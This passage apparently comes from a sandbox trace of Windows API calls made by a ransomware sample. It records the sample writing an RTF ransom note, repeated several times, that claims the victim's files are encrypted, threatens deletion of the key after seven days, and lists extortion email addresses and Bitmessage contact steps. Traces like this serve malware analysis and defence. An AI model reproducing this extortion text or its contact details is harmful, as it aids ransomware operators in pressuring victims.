\\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0289.689] WriteFile (in: hFile=0x2cc, lpBuffer=0x235fca8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x235fca8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0289.689] CloseHandle (hObject=0x2cc) returned 1 [0289.689] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Feeds\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\feeds\\#readme_eman#.rtf")) returned 0xffffffff [0289.690] GetLastError () returned 0x2 [0289.690] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Feeds\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\feeds\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0289.702] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.702] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.703] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 